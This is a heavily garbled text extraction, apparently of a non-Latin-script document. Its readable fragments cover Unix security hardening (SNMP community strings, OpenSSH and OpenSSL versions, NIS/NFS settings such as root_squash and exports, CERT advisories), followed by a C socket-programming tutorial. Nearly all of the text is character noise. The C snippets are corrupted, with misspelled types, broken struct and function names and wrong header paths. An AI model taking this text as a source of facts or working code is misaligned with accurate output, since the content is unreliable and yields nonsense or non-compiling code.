6 & " - Y ?# (E : 2 SNMPZ&F ) SL 7 L - 4- ." 0 6 @ " U4 GF 9 SNMP? (E # % ! T G'd * 2' 5 ' 2 F)0 (E w•w)w•p 67 4 ) ("c 7 K&F " 6 @ I5 0 b <" 6" F T/ “SNMP“ R4S B1$ SNMP @ 0 5 - Y CERT-2002 03h @" ? # n. 7 a < ,6 3 ? G -, < - Y ] 13 W L3 $SNMPSL ) " H,, )S @e G F)• 'j 4SNMP Community )e _ P ! ") F)• community SNMP Y* F)• 6 < DY/ - . $ l ' R4 S @ : % DY/ I 5 0 5 a-, ,, )? P@ ?@ " - Y 7 ) X (,! 7 N& ) 6( 4 , K I 5 $ SNMPv3 6 3 6, " % DY/ SNMP ? 5 TG' g• P T, " - Y • _? # 7 -, < K patch * j* ? $? , 2 3@ $) , 1 7 L* 6& h,/ % H SNMP coomunity R4 S @ : % D Y/ 7 , H ? 4 * " 6 @ ] 6- SNMP " - Y 7 S L $-, • ,1 b 0 5 GF $ CERT Advisory CA-2002-03 5 5X )TCP/UDP , ^ w•w7 4], K5 SNMP agent K6 9 ),. !89 SNMP 3 b 3 , ? & w•p7 4 6N "• T 2#5 l ' J)0 ("c T $U# B'T) ' " - Y 0 , ^ P A R 4 W L3 ? 5 V8 SNMP• B F) F 3 7 L lYB 5! ? y 6 6- SNMP agentb 6 6 3 $ ) 6 ) TCP-Wrapper P (E 6 % ! agentb ) ) l '7 B 5!0_TCP/UDP ) X # 0 - Y B' #P < ? 6 1 )$,< Q 0 (E ( E xined , & ?& #4 agent ) 0 < +H ) [ h,/ % H DY/ SNMP? 5 TG' g• ?@ " - Y 7 ) X (,! 7 I 5 $SNMPv3 N& ) 6( 4 , K 6 < % P " - Y • T, _? # 7 I5 W 3 " $) ("c 2 0 - Y _ - ),. ) ) 7 L )- ) ( #. 6& ? G -, < - Y ] community P! h,/ % H g & ) 0 @ 3" ? , O* u& ("c : 2 0 (E N "W 3 6 F 7 # " - Y • P ! 6& -, < ' - Y $http://www.sans.org/resources/idfaq/sanmp.phph @ ) TCP/UDP , C ' W L3 • SNMP " - Y 7 * 0, < I ] 6- ^ w•w7 4], K5 B' , ) ) 6- l '7 B 5!0_TCP/UDP ) X # y B' #P < # 40 (E 0, 6 ( E $-,< &5 $ , -,< K SNMP• B ^ w•p7 F) F 3 7 L 6subnet 2 SNMP " E ' 4 6N I5 SSH (Secure shell) % 'T F$Login " )7 l ' * ] OpenSSH &'( 25 " U# P - Y $SSH Communication Security R- ) telnet$ Ftp 6 ,G P 6=GX$ -,< - < * &K/$ ? @ " , ,G ) - ,, 2 5 0 b _ U) $l ' R 4 S @ : _U : F 6=GX Q 0 F) )- 56 ?# $SSH " - Y N5 6=GX ,< F -,< K 7 !89 Q $"), ) ] nix*) "), ) 1 $U# 0, 5 Command P B '8 i: ] #P < SSH # ? `56 1 )$,< K &F 7c #< C ' )? , (, !$ 6 Q0 )_open-source 7 L 5 ( ,H ? @ ? 5 M 9 R 4 S @ 2< ? ,6U) ) 6 E * P $SSH 5! U ) bP 0 ?5F SSH 6b. 
SSH-, < " - 4 6* SSHS %K , ( N ) 6Patch $("c " # ) , #4 0,< , ^P < TP, C L3 3 W 3 78# ) SSH2 K 6% # ) 4 & ) HTTP$U ) $telnet -, < - -, 6 U ) …-, ^ P C $_ SSH2 SFTP U) L3 A" R4S 4 Kc F) ?@ ? # 2 # " @% W SSH2) SSH1 ], < ? # -, 6 U ) ) -, 4 (,! 3d * 6 * R4 S @ , 5 6 &'( F " , G $OpenSSHb & < - < # 2 6& ) clear text 7 L -, L3 2 U) P I $ SSH1 % # ) 40 H session & SSH2 # ) 0_ OpenSSH " 2&N F , 5 ,H]POP3 ? , % 1 2 , 0, < ], N, # @^ 6A) a I ]rhost 6sessionS % # ) 4 " - Y $ #P< ) : R 4S ;! _rlogin) rcp rsh$, K 7 !89 T )- P d * ("c0_ SSH * ("c F) & Z Q OpenSSH ? -,< E 6% 4% CERT 2002-23h @ " ? $ 9 l ' * ] OpenSSH " - 1 @ * I 5 0, 7 K &F " 6 @ pqqp T 0 5 - Y Advisory ) ' 6S @ ;! ) A % 3 6 ? " R 4 S @ (, ! " ? 59 ) : I 5 0, < trojan-horse _ 2 7 !89 S - Y http://www.openssh.org/txt/trojan.advh @ " ? $l '- 1 @ * 0 5 ,, e G -,< K * ]?@ " ,G OpenSSH 3.3 ?@ ) U ) SSH Communication Securitys SSH 3.0.0 % ! 6 1 U# * 6 )_version 3.6.1$pqqp T Z F ) S L _version 3.5.2- 5 < pqqs T -, < K 0 < ,6 3 * ] ?@ " , G HS @2 e G $ R4 S @ d * * R4 S @ W L3 -,< SL U) * ("c - 5< " $“ ssh-v“ ) - " d * 6* $S N 4 ? : 2 & $ ScanSSH0, Patching (,! % 1 , 0,< - 5< ^ P ScanSSH * " - Y 0 #P < 6h @ 2 3@0, 5 K 4 6Z 0 5 SL ?@ http://www.monkey.org/~provos/scanssh/h @ " ? ' a Patch2 3@ ) R4 S @SSH? , 6 ! " %& 0, (E - @ < &) j 4 ? , 6 U ) -, < K pqqw T 0 5 F I5 , Y 1 $ ScanSSH :3 " ? - . F " * $l ' R4 S @ : % 2 3@ ?@ ) 0, < 2t5: ?@ * ' DY/ I 5 )SSH * - 5 OpenSSH )SSH # $,< -,< SL $% ! ) openSSH 456 123& % ! -, 6 K " 9 2 3@ SL " $OpenSSH" - Y 7 • SSH1 G : 0, 0,< ? , - * P , TL ) I - * 6 & " 6 -, 6 U ) S! 5 $" E ? ! j &' 0 6A) $?@ I5 ? @ " ? , # 4• U) S 2 0, 5 U) N 4 )• W L* ,K , #4 SSH? , 2#5 -, " I 5 0,6 d * ,Y : 5 5/ rsh 2 NO , $SSH , # 4 % ' FallBackToRsh, B P -)8! S ,6 3 - 4 * )? @" - Y 6 ) ? - Y O B : 2#5 $DES3A) ] L F TL ? " 2` 7 3 5L -, @ ), . ? # 0, 6 ( E 0 0 F) $SSH-,< " 6 2< " - Y ) ) <, ! 5E F 6 & " SSH SSH2 G I # 4, G ), 51 /• SSH2 SSH1 * $ Z - Y DES3% 2, 0_,< -,< ' 3 P ( #. 
N& " • blowfish I 9 * " & -,< ( E e 'j 4 N& $ 7 B 5! + ,I ! + ; Q NIS/NFS ) $(Nis)Network information Service)(nfs)Network File System U) Sun ) $ NFS0, < <b #P< F ) V < ? # l 'U ) 6 '• & 6 6 2 " - Y 7) Y 6 % ' I , 6% ' Q ) u T 5! ? # $NIS & 5 maps] 7 u T5! 7 ) X (,!]0, 5 ?# ^ 6% 'V 0 -, ) L*< 6 $ nis0 7 U# 6 #P < I 5 Microsystems < " - ) 4 ) / 9$U# F 2 % 'V < , 6% ' A) $ NFS0 , -,< +" , 0, 5 -,< - Y !89 U) 6 'hosts)passwd 6 '_ !89 ] : 7 !89 K $NISM,62 5 0_ #P < " F 6 I 6 5 group)passwd ? ,K & 5 =GX C 8Q] NFS I #P< 6U ) B'0 I5 ? @ " ,G ? @" , ?5F 3 ?1 ,, e G 6 " H NISb I K6 &'( " - Y I 5 NIS " (& # 0 ? 5F ,K ) 6, " 0,< dos$buffer S ', 6? G F 6- Y/ " - Y Z -, < - Y - Y patching)NIS)NFS 6U ) $S F 6 0 _? F 3 785/ , 63 ) - !89 )- B . 7 3W 3 F - ?5F S 6=GX ) ? H ypcat j 5 P! & $() * - 5 U 0, < 1) U# NFS )NIS " +, 6 5 CP TG'e 'j 4 7 L $ l ' 6U ) + 6U ) : ,F ) ) - 0, < K NIS)NFS " * -, "2 (E R4 S @ 0, - 5 - Y 6U ) )- \ " -, < ( E 785/ Q 0, -, # 4 (, ! 7 % ' $NFS)NIC 56? 5F $ l ' 6U ) , K 6maps] _ I 6=GX , G 785/$ ? @ " - Y overflows - _ < 0, ! ". /0(123& R4 S @ d * I5 a K6 * 5 0-, ), , e G ,1 b ,< -, -,< K SL ? @ ) F patch 2 3@ " - Y NIS * I 5 0 ' 6 @ -,< SL NFS * j 5 & NFS * 6@ - 5< l ' • patch 2 3@ SL " ? 59 ) rpc.mountd-version - 5 <" 4 6* Q ) -, (N 0 < ,6 3 HS @ - 5< " ? ] 5 - Y ypserv-version " ? 0_ ,6 3 (N R4 S @ ^ 0 R4 7 N 4 " ? $ &'( , ,F 6=GX W L3 , "c a 4 NIS map ? 2 0 F P! a 4 NFS S 6" E ) netgroups$? % ' & ? 7 L -,< 3 I5 , N (,! " ? 59 • 6& " • I 5 cracker " -,< = G 6& ( #. " 5 , # 4 (,! password root 6 0 5 - Y $-,< = G - Y NISS " I5 • R4 S @ d * P ! , # 4 (,! ( N W L3 3 I5 ("c • etc\exports\. ) -, < export " ! -,6 I 5 showmount e F• 0 ?@ 6 R4 S @ : % 4$NIS , # 4 a " ("c N 4]? , U) NIS? , 6 U ) ) 0_NIS -, 6 U ) -, 6 U ) 67 S 2, 0 4 n 9 " ) -, - Y makedbm ^P " ? 5 d* • i ? G 6 TG'Yp-secure U) DY/ - . 6I W L3 J)$ DBM 6% ' E ? " b 1 - 5 S ˆK " ? 6 : 2 3 0 • C ' ,6 3 v 4$" E 0 5 -" /var/yp/securenets 4b 6 #P< ) U) a % ) ? 
+:*:0:0:::z • password map 4 NFS , # 4 ^P - -" F etc/exports % ' ? , U) " 6h @ " - Y • qualified domain names]fully_FQDN ) IP ,! 0_ < & z • - Y ypxfrd) ypserv 6 0 NFS ? , 5! # "] G - Y $ NFSBug ( 0, 5 " ? K , , #4 I5 ! I5 • #4 7 # l ' 0 5 $NFSBug " ? ' 0 5 - Y ftp://coast.cs.purdue.edu/pub/tools/unix/nfsbugh @ % ' : I 5 etc\exports % '" - Y • ),. T5! a " 25 ? )&' NFS % ' 4 U) mounting " 15G ? domain ( ^ 4 ? )&' NFS 6 G5 … ) IP h @ " U 4 home10.20.1.25(secure)a8Q0NFS -, ? )&' ? ^ l '7 B 5!0 S IP " U4_2< ) ?, 3 0 NFS % ' 6" E rw ) ? 5 export … ro]("c , 3 b' ( E etc\export % ' NFS -, U) 6" E domain ( ./ro)10.20.1.25 homeC 8Q ^ Domain ( ) IPh @ " , G root_squash superuser $, < -,< TG'l ' NFS -, 6 U ) ) 4 # H$ -, U) - Y NFS? , 0 ID nobody 4 "$ ?# 7 NFS -, U) user root S ) 0 … U) ID root ) 2, 0 2&N F , 6 * root ) 6% ' u root_squash/.)10.20.1.25 homeaC 8Q ? l '7 B 5!0 0 TG'7 4 y 4 % ! 4 NIS ) NFS 5 ?,< V8 " ? 59 ^P I 5 T) ' 6 • n 9" C ” ' " ) (_Rpc.nfsd] pq‹{ 7 4 )_portmap]www7 4 C 8Q] U) ) ( E ./etc/system % ' 1 line set nfssrv:nfs_portmon ? )&' a 67 $U c $ NIS)NFS ? , 6 U ) N" • ) X ?# 0 <( E " E ? , g 0SSH• I 25 % # ) 4 2 NFS" - Y W L3 ) • ("c 0 5 - Y http://www.math.ualberta.ca/imaging/snfsh @ " ? NIS ? , 6 U ) , # 4 ) SL Z )? , ^ ,1 b -,< K 6 @ 0 F 7 !89 " checklist UNIX h @ " ? $=! > 5 SL • 6patch * %K : $ NIS) 2 3@ ? 5 m .1 U# 0 5 - Y security d * K6 W L* deamons ) ("c N 4 0 5 MR/ , K ) / 9 NIS )NFS -, 6 U ) I 5 0, -, ) " NIS ) NFS? 5 TG' g• ^ 6 )]NFS ) NIS _?@ ) 6U ) ? Layer open secure sockets (SSl) ? )&' H I5 f ^ P N, # l 'f #4 " -, (E N ,G #P< n 9 " - Y 6 open source 7 L ]openSSl &'( $_ 2 K6 -, < 1P 7 !89 j &' ? ^P , 5 4@ -, 6 U ) SB g ? 5F 0, 5 " openldap,cups,maila I OpenSSl0 < , 6 3 a 5 - <? @ H$ l ' R 4 S @ ^ N H F 5 " - Y 0, < 2 ,G e G 5 openSSl - Y openSSL ,G $( * # 0, - Y - ?5F 0( openSSL 5 & , 5 ? 
$ openSSL M, 6" 0, 6 - Y openSSL 6 25F 6 #P < I 3 785/ $ : u 3 3 K O* " H a, 5 5/ I 5 ],< openssl " - Y $ 7 I N& H M, 6% - Y openSSl " 4@ -, 6 U ) ^ P $hhtps " 0, - " connectionn N& 3 <) 2 5 $ 0_‹‹s 7 4 ) * R4 S @ ^ $() $T) ? G - *1 , ,, e G % ! 6 F ) openSSL 0.9.7 * ?@ ) U 0 < ,6 3 1 ) U# HS @2 e G 6 " $ 6 F ?@ " %P H R4 S @ d * ,, e G $,< -,< SL ?@ " % H I 5 $ openSSl version " ? ) versipon 0.9.7a * : 2 0 5 - Y $-,< SL # 0 < ,6 3 &'( * H S @) - 5< " R4 SP @ : % a 4 " - 5 OpenSSL # 9 * 2 3@ 9 % ! %L 0 I5 "2 F 6 & openSSl -, 6 U ) ) • ?@ ) ' • ) ipfilter" $? # 7 K6 <- Y Z , 1 " $,< -,< SL % ! 0 5 SL T 5! DY/ I 5 2 , ,F ) 2 3@ -, 6@ DY/ - . $l ' R4 S @ : % $ openSSL * - . : ), . $, Q2 gN8 3( 2& & Socket Programming K &F ? G ) ( E % ! Unix % Q 6% ! ? , u 0 < F) M :G 2 @ TCP/IP – B #) 4 " 6‰ 9 b bP S L ) K ?@ - 56% ! h ?@ IP)TCP B #) 4 SB F Linux % ! - 4C c 5G 2 ?, Windows % 6 " 6N "@ H8! I R1 6b . %B .) 0 N C %Q @ , 6, b. u ,6 * U ) - ?) -, < = D U / 9 < b. # = G c • A 3 ) ) W 3 # ) #1 C5 6 2 ‰9 6Y . , U BT 6 K6, $n5! , GCC F 2< ? " c . K %L'2 , • ( Y ) #P< TCP/IP% # ) 4 i . e ' , 5 % <@ #P < . H 7 -J) 7 # G( 0,< e 'T/ % ' , 2< A) - 0, 5 %L'2 0 b. 4 b. 1Q ) 6 K 2 `56) ) Linux % ! 5 63 6C? " , , < 0, -,< 5F ,63 PE . ( Y2 . ( 6 ^P '#< ,P 1 " g@ : %L'2 0, #P < . Y( H ?@ ( Y , (5 I %L'2 c ,< 6 P" U# (5 % ! ) ,< \, 6 ) 4 2 - / y ?/ 9 b ? F T P) #P < 0 % ' 7 b B'" ) N4 , & (I/O) 6 F) 3 ) , 5 6Y ", - 6U# 5 <, < $, 3 @ T, • , < -, < ) )\ , )% % ' b. B 5F 2 5< , < ! ( 5 •0 < T, ) 7 @ L N4 # B % ! N N) (E " , T /2 ! )- 7 B 5! 3 , $2 k a, 6, (Read Only) < b' B'7 L ?@ , ( _ fopen() - <? ! % ' L* % ' , 56 N4 open() 7 % ! &@ _=1 ] 0, ' %P H B / " E _O 0, 2< 15G 7 0, ?56 , <T N4 $_ fwrite %PH B / " -,< " % '?) _ fclose() ? ! ˆ6 0 ) ) ("c 2 -, ! 2< close() 7 U 0 ,< ,6 * B / , j 5 .Y % '( , H 4" ] 0, , P % ' ( 5 " U4_ 256 < ( E , B 15! ) N4 * ? G N4 ", - # H- Y 0 , 5 T, % '? ! # ), , F) 3 ) =B* a, R " 6N B / ?@ " ?, 3 j 5 .Y 6N # U B 5! ( 5 ,6 3 M Y< ) - )? 
# @0 (5 H U# < b' B' N4 , 3 b' , 3 B'T < ) < ) , 3 < ) 7 , 3, F ,B B'- B'U# I/O \ L % ! a 6 5< $ , 3 B' * , 3 b' (con) I ) ) 6- & , < ) 3 = D) 2 0 < ' 2 _z ]% ' C H ,< 'G N4 b '$ 6- write() 15G k ) ", - % ! , ) % ' ' b. 6 ' R4 ? … B' N 4 … ? G j 5 .Y … B'T 7 4… ) GH ) % ' … ) GH ) % ' … 11b3 FIFO = … # 2 5< 26• T/ T, ) X ! % H , % ' F) 3 | ) ) 6 ) ?@ 2 7 !89 1P ) #P< ) ) ^P @ € , (I/O) ) ) 2 ^P - N@ 6, 5G #P< ^ P a •^ P • ] H ' 2 T 5G nP9 7 ) - 0, 2 N g ‰8: ), ?) " IP h @ ) _d * , , •^ P socket() 5 ˜4 g - < - <• &@ $, , $ &@ 0,< ,6 3 - Y - <? 6 ' ^P ' 7 3 ,G I ) #P < 6- , 6- 1P 7 B 5!_z , SB 9% ! 0, & , 3 ' 1P ( ,H [ 1P 7 , ? 1) ) + _O ?@ " 6- ' %5! P (Null) —14 5< % ', 56 ^ P ,< ( 5 + 7 4h @ 5< % ! 0, 5 " 6 6 '_d * %5! ? read() ] rece()) [ write() ] send() + _=1 ]W 3 ,6 3 ?56 $%P H B / 6 3 % ' - < 0, % ' " T) b < ,6* % ! ?@ ) W 3 & @ ' R4 % ' 3 3 ?@ " •" N •" - 62 " U4 ) TSAP : ) 2 7 !89 1P " ^ P ) 0 ,< ) ) ? " , /) % '2, #P < . 6 ) $, 3 6^ P 2 " 6 L* @" ? &56? B', 56CH < _% ' - < ] ) < " ) TG'^ P 2 , 0 (E - @" ? &56 : 1P @ " (, @ 6Y ) 0 , F) \ ) a ", P ! 'G \ ) 2 _0 , 0 < -, N1L \ 6 56 I " 56 1 ), 66 6 #5 \ \ 6* N \ ] 6 … 0 < 6 Y 2 7) Y $ \ -, TL ?), \ ) 2 ( Y2 &5 6 T A) 0, 6, ' 7 I 2t 5: ) S N` 6) 2t5: ! ( 6- 2 \ . ) P! ™Y/ , " $ (FTP) % 'T %# ) 4 TQ ? G 0, TCP A) ?56 (SMTP) # ) #1 6 T - \ " C GP 9) , 1P 15 / F) 6- 5> K6%# ) 4 ) 7 ,3 Q ? FS ! 2 `56) 6 (HTTP) 2 %# ) 4 6:3 ? FS c 6 6- 7 ! UDP ) TCP \ ^ P 0, < , -,< = G ( … ) j4 ) , \ , H I, 0 - ( 7 .Y T 62t 5: ^ P H %# ) 4 , " N56 0, " 13 ) S ! ) 6 TCP % # ) 4 0 H ) ^ P ˆ6 . %Q 6 H " $ 6- ?, " 3 A) 2 2 / 0 P CH B / \ # A) 5> 2 6" 78# (5 TL F) 6- )- ,6 3 ,6 3 (8! % ! + ) >' ,6 3 i: 6- " - Y % ! ^ P = G" 1P " UDP 0, S 6- 0, < ) $TL 2 5> L ) , 0 ,< & 1P " \ 1P 6- , #P < 6- P( DNS H- Y TCP 6% # ) 4 " - Y ) , ), < 1 ) 1P :3 0 UDP %# ) 4 ?), ) N 56 IP %# ) 4 ) , 5 +H ) ?@ 2 " c %P H CGP9 ) - ) 6- B # ) 4 TCP ,< - < C 8P H 6- < T T ! 5< / UDP 3 !& ( Y 3% 5 C 85! 
= G U TCP %# ) 4 7 K &F ?,< E $^ P H F ?), " | -, 6 U ) ( Y G ,< '9 ) 9P \) < I.1 " 6 F % H ^ P 2 ' 9 R 1$ < # ^P 6 ^P 2 0, < - 0 % ,6 3 = G (8! % ! š7 ^P 2 6- < #P < ) 4) 2 6- M 9) R4 ?# # 2 ^P C 85! 1P 3% 5 YB^ P -, \) < $2 '9 1P $^ P A R4 7 C, ! H • • 0 ' ,6 3 ( •-, 6 U ) 0 ^ P -, •_- \) < ?@ I ) ] a 0 2 7 !89 % 5 ) @) ), SB 9 , , " R4 R4 5! = G ) 4 Client c C ) 4 Server -, 6 U ) 3 !89 , /) $ X task , 5 I ) RN V < 7 !89 0,6, % . I $- 7 P! I T /2 ! - )- ? ) 3 F 3 O) -, 6 U ) O) 7 .Y S1H ) )- 5 < SL -, 6 U ) ?@ A" -, 4 " U4 )- 2< ' \) < -, 6 U ) H) TQ ? G !89 7 .Y 2 " 0, 5 T ) " 2* X X 2 ) 5 v 4 ("c -, 6 U ) ^P H B 1/ 2 P 5 X , 5 T I S v 4$X 0 7 !89 3 $" ) ,< ,G , 2< ;. , ) -,< +" 6 5 6 / 7) Y < ) N] 0 6 ^P % M 9 ,G 0, 6-, 6 U ) ,G C c 5G 2# 1 _0, ) N* 4 $7 !89 S/ , * H -, , T I Y , N I N M 9 – …-, 6 U ) 5 –, 5 T * 4)j N ;. 5 … 4 B F TQ T \X I : -, 6 U ) 0 5 3 ,6 3 7) Y $ < % $ a % ! b' \ % ! % ! , b. F $ 0, + b (5 2 0, 6, , -, 6^ P ? 6X A R4 I ' % <+ 6- ) >' , TCP ^ P Q ,/ , 6X 4 E " < A) 2 G Q ,/ ? G % ! ,< ( E bind() ) TCP TCP 5 6 6 $ " 5 ,< ,G B / _z 2 0, 5 \) < TCP ,< ,G ^ P A R 4 (8! , ' F )T ) -, < ' R4 ? &56 , " U# _O < (8! % ! b ^P ^P ,6 5< ( E listen() G ) " - Y -, 6 U ) , 3 + b ( UDP 4 - 5< UDP A (8! " / 4h @ , 3 , - 0, ,G 2 G C c 5G 0, < A" TCP ) < ) A R4 TCP 7 9P - / &1bind() 2#5 ? 3 2 _=1 = G, " 4h @ 7 5< L* 2 'G W 3 7 ,G #B 3 H ] 0, _0 ^P P 7 5 5 ( E Socket() 5 - 5 < ? <,L R4 ? G < ^P (8! % ! : 5< I -, 6 U ) 'G ( UDP 2 0, K5 ) # @ " %P H 2 `56) -, 6 U ) "7 B 5! 0 < 5 1 5 0, ) ( Y F T/ › (E B / 2 56 |-, 6 U ) 5 ,6 3 , " E ,! F N1 a K5 , 5 6X H 0, N ("c >' :, ,G 2 , 1 )$ 5< 0 7) Y ^ P 2 , T G') " 7 , L L $? &567 L , 7) Y B' , G " < -, 6 U ) ) 2, )@ 6" 7) Y ^ P 2, Q ,/ ,G % ' 0 < " ? &56 : 5< ? G 0,< b , < ] nB G 7 9P " , X " accept() + - Y % ! Y D 7 # accept() + 0, % >Y 'G 5< C _ _ F) 7 0,< ,6 3 0, K5 - Y 0 ,6 3 5 recv ) send 7 1P R4 ?# A) ) 2 0, 6, 5 3 _ close() + b ] ' _ shutdown() + b ] ' )T _- ^P C _) '9 ) ^ P +:H … 7 B 5! " # ':# +:H … a < T5! 
% ! b' E 0, ) F $ ^P 0, P 7 4h @ 3 U) ^P -, 6 U ) H , 56 -,< (8! ("c ,G B / , F) bind() " - Y X A 3 #B$ ? N " ^P connect() 5 ?@ 5 _=1 6^ P = G , " -, 6 U ) 5 L* _O )&1 G , 6, + " - Y X X I ?@ , ,< -, 6 0, TCP ^ P 0 H 9P 2 TCP 7 9P 5 _ Hand Shaking] B / ( E ) \) < 1 C 85! connect() R4 < 2 M 9 1 ),< 0 ( , H 6- H ' )T ' G 'X $ &@ ˆ 6?), , %/ $, < " bind() + " - Y ,6 * ("c TCP ^ P # ^ P -, Y < , 93 C,E 3 7 4 - 5< \) < ' connect() %5! ) -, 6 U ) 0, 5 0, 5 ( ,H 60, 5 +:H '9 '9 ) 7 ' T shutdown() send() ) recv() + close() + " _z ^P _ ?@ H) 5 -, 6 U ) " 5 6 1) ) + B 2 `56) 60 6, ("c ?5 3 6C _0 , ^P \ 6, \F u $ "= G `56) ?@ - N G H ) i. H 6- " g@ • L* •$- N \ 21 ) ) H- Y a,< L* $^ P = G C 8G'0 ?5 3 .$ ,! ` -, 2 $% ' - < , 56 ) 47 4h @ 3 ?@ G:H ( 5 ] 0 ?5 3 " 6 u " U4 H P " N1 H - " , A Int A; \ 2 ) ^ P M 9 2 < IPh @ 3 a "7 Struct Sokaddr { Unigned Shortsa_family ; /*address family AF_xxxx*/ Char sa_data[14] ; /*14 bytes of protocol address*/ }; 2 G & 2 / R 1œ ' , 6 3 \ , 6 #P< d* B #) 4 ) TCP/IP % # ) 4 N 0, #P< ;. 6 $ IP h @ $7 ) 7) Y 0 < 5 -,6 ! 5E 5 2G [ 3 - 3 & 2 Appletalk %Q ,6 3 7) Y 4h @" , B #) 4 8G'0, C AF_INET 0 N I %L'2 % d* 3 a sa-family … - ) ) ) #P< 7) Y 0 \ 2 a sa-data … - 6, B'2 c = G 1 ) ) )Y = G 1 ) B PH # T G CH a, N - < - *1 ( , Struct sockaddr_in { 'G ` 6" , 5< /*address family*/ Shortint_family ; Unsigned shortintsin_port ; /*port number*/ Structin addrsin_addr; /*internet address*/ Unsigned charsin_zero[8]; /*same size as struct Sockadda*/ #P< ), 2 G - 3 d* # I ) 8! ?), $i. d* ,! C 8 , 56a Sin_port … [ , ) ,B'2 a Sin_port … ) 47 4h @$ A 3 ,B'2 0, % 3 < AF_INET 0,< 0, 5 B P H 2 < IP h @ a In_addr … I , , b '$, < , 6 3 = G 0 Y , , B #) 4 8 C , 6 #P< ( 5 <= G , ( Y l'# IP h @ C 8G' h @ T 9 6 #P< " - 62 a Sin_zero [†] … 6 ?@ $,B'2 2 #P < N #P < Y C 5 memset() % Q G 9 F) % 1 0, < ) -,< - Y T G 7 0,< - Y % H #P < 3 1/ 6 ` , C5 / 1 ) 0 < $7) Y B #) 4(5 ) 7 4h @ " N62 'X 0 62 , 0 < " (, 6$+ 3 ' ? 
= G " - Y \ 5E ) , T G CH 1 ) N B P H ` F •\ n : • 0 ?@ 3 -,< = G in_addr ( N ) # () ,6 3 , 5 H # @ / () # = G 0 "7 /*Internet IP address (a strcture for historical reason)*/ Struction_addr { Usigned longs_addr ; l '7 IP h @ ?@ = G ) ?@ 9 0 2# 1) , B P H # T/ 6 - Y <) 5< - *1 I'/ 5< ,6 3 6 a < F - 3• 3 2 1 6,/) S < SL " LE \ " < 6 , - m.1" G < 78# _- < 7) Y <R -,< n' DE 7 H) R1 S E! 5 6, B' F) LE \ ) BE \ H #P < ) c , ,< - < ) , B'2 'G unsigned long 6" , 7 5B " I 1 ) 0,< , 6 3 'G ) % $, -, < = G c 7 %# ) 4 N TCP/IP S LE ) 3 < H) TQ ? ! 0 3 Struct sockaddr_inas ; As.sine_port=0 xb459 ; " U4 R1 H A" I _- P< CG:H )] 4 ?@ " ,G ) < - 3•T) A" 7 4 h @ TCP "7 ? ) 2 2' H a,< ,6 3 B4 59 ) + , 6, H 6, B'?) , 'G % 1 2 56 0,< a S ) X U htons() a BE 1/ htonl() a BE 1/ ntohl() a 2 < H) 2 ) 2< \ ? N #P <U ntohs() a 2 < H B G' 1/ BE " B G' 1/ BE " & ? ! " ) 7 5B % ,P + 7 5B % ,P + ) 7 5B % ,P + 7 5B % ,P + , , A SL " ) F- Y 6, B' 2< ? 3 ("c U LE 7 H " %PH C 5 /? 0, - Y l '+ IP TCP , I ,B'C < - Y l '+ sin_family , B' sock_addr_in ` -, < = G % ! l '+ " <@ l '+ ,B'2 ) " H) b'a R T Q? ! < I H ("c , B'2 6 , - Y < 6 3 [ AF_INET , R 1$, < ,6 * % 1Q #P < ) ) 0 5 - Y a 6, B' IP S1H @ < h @ ,B'?) IP h @ I 78# , IP •2 6h @ ;.P a, < < 6- pwwžwwžw‹qžw{p ,! IP h @ ,B' sock_addr_in ` IP 3 @O L F "+ ) 2 1/ 4 long \ " ,! < a ‹‹žwwžwpwžw†} ( ' , B' BE S1H < ,! % ,P R1l ' + 2 a inet_addro() + … U4 ) < h @ c TQ 0 h @ 7 L G ,6 B P H + % 5! U#! + 2 ainet_ntoa() + … (E IP h @ < ) struct in_addr \ " l '+ H 9 7 L ) ) 4 0, 5 a " TQ BE S1H @) ' % ,P $0 = G : < \ ?@ F) 3 printf (%s , inet_noet_ntoa (ina.sin_addr) ) ; k F) 3 ) - G ) : < 7 L h @ a "( ' . l 'TQ F) 3 C 8Q 0,< ,6 3 wqžŠžw‹wžwsq IP h @ www.ibm.com ( ' -" / )= ("c + G , ?@ " % P H0 @ % ,P N N @ * 6 3iX b. 0, < = G ^ P _ TCP P] -, 6 U ) H - Y + Socket() + a "7 + B( ' #include <sys/type.h> #include <sys/socket.h> intsocket ( intdomain,int type,int protocol ) ; - <C 8PH . I AF_inet 0 < \ , , , , (8! Type , B' ?@ , 3 -, 6 ? [ , $ ? 
6 *1 #P <U \ \ 0,< ( \ " H sock_stream ) 6, I ? I %# ) 4 0 #P< . ,6 56 H( #P< 6 ) T) 6, B' 0 –, G + ?@ " " R 1_% ' , 0 Ÿ + 2 N <- Y , ,N H , F) 3 C5 / , YD U + 256 F) 3 :3 - 5 < error " ? G 5 <) ,< , 6 3 'G + , , + :3 - 5< A" < 7 B 5! u ,< …w , socket() + Perror() 5 56 5 3^P ' %5! ,< …w socket() + , ) ) - P& @ , [ - < % Q C H ] ,< ,6 3 - Y 0 < =H ,6 3 ?56socket() + b L* L* a Protocol … < - 5< ,B'2 Y ?@ , [ I Sock_DGRAM 0, , ,< a type … 42 \ ? 6 *1 3( 4 2 a domain … 6 , 4 0,< H) - 5 ) , = G " + ) u ) 2 0 -, @ 1Q ?@ # A) 0, 6 a Bind() + ^P y b'5< bind() + 0 h @? -, P 0, 5 6 a, H (5 , ,6 - 5< , < "- 0, 5 = G 5 c 5G C •-,< " 7 4 ( c 5 / = G2 C U4 " Bind() + n 9 " W 3 7 4 - 5< ^ P http %# ) 4 TCP ) A" H) ˆ 6" 6 1 ), - j6 3 % ! †q 7 4 B . 2< % ! G -, 6 U ) 5 A 5< 1P B 5!• , ,6 5< G2 " ( E 6- F ) UDP TCP / < 6 4) 6X Y 2 `56 H) TQ ? G ( 5 $-, 6 U ) % .$ †q @ ,L " 7 L bind() + a 7 4 B( ' #include<svs/type.h> #include<svs/sock.h> int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen ) 0, - " socket_] + " - Y 0, 6, B . P " h @ L* -,< " 5< , 6 3 < IPh @ ) 7 4 h @ $ - 3 % ! @)- - N@ O* 0 S / =:1" 13 @ < I Y ' L - 5< My_Addr ` - < , 7 $ •ŠŠsŠ 5< F) 4 h @ , B' 2 3 0 3 T 9 a Addr_len … # Bind_] + U# wqp‹ - 5< " 7 4 0, / a My_Addr … ` 0,< = G C 8P H ` a ?56a sockfd … 8P C H I b . _= 1 @2 - 5< ? ! 2 , < wqps -, < ) " # Y 2 6-, 6 U ) 0 ,6 * ? ?@ )z * ) 4 , P 5< , _O 6-, 6 U ) 6 I INADDR_ANY $, , & 4 - 5< 4 2 " -" F % ! IP h @ , B' [ , IP h @ 5< B . 2< ) U# 37 b. % ! 0 c 6, B' 6 ?@ , % ,P BE 1/ 1/ Y , 1/ ) , Y N- 3 